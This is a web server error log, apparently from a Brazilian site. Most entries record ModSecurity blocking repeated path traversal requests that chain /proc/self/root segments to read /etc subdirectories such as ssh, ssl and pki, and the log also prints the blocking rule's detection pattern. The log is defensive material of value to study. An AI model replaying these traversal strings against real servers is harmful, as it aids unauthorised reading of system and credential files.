https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:59.745121 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:59486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jvvXLqtnMIWvjpaLS2QAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:00.889902 2026] [mime_magic:error] [pid 10189:tid 140411641214720] (70014)End of file found: [client 74.7.243.128:35944] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware
[Fri Mar 20 12:12:02.235600 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:59494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jwjJ3M9BSuKP7CAZfugAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:03.510315 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:59502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jwxCii7xarUs8iHahHwAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:04.791348 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.241.31:59510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jxBCii7xarUs8iHahIQAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:09.763992 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.241.31:59518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jyV1pVZ5mVmJwsFNkkQAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:10.678002 2026] [mime_magic:error] [pid 10189:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:57700] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:12:11.252104 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.241.31:57064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jywF0L0L-SsrnPo6elAAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:12.694505 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.241.31:57072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jzLninkcc-iUj5AqSDgAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:13.494139 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.65:57972] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1jzda6ubjKNq_cu4YTagAAA0s"]
[Fri Mar 20 12:12:14.174077 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:57088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jzuoXxyEfFpUF8f-10gAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:15.742398 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:57102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jz9a6ubjKNq_cu4YTcAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:18.175406 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:57118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j0ta6ubjKNq_cu4YTdgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:19.566392 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:33574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j0_qxLDW4GITHUkQhcQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:24.415252 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:33586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j2AF0L0L-SsrnPo6epQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:25.703032 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:33594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j2fqxLDW4GITHUkQheQAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:28.230894 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.241.31:33604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j3PHIg5MgXLBnicMq9AAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:29.494389 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.241.31:52594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j3V1pVZ5mVmJwsFNklgAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:31.898334 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:52606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j3xCii7xarUs8iHahMwAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:33.361269 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:52606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j4RCii7xarUs8iHahNAAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:34.859042 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:52608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j4ta6ubjKNq_cu4YTfAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:37.129066 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.241.31:52616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j5AF0L0L-SsrnPo6eqQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:43.244818 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:36812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j6gF0L0L-SsrnPo6etwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:43.814141 2026] [mime_magic:error] [pid 7235:tid 140411616036608] (70014)End of file found: [client 57.141.18.99:59216] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
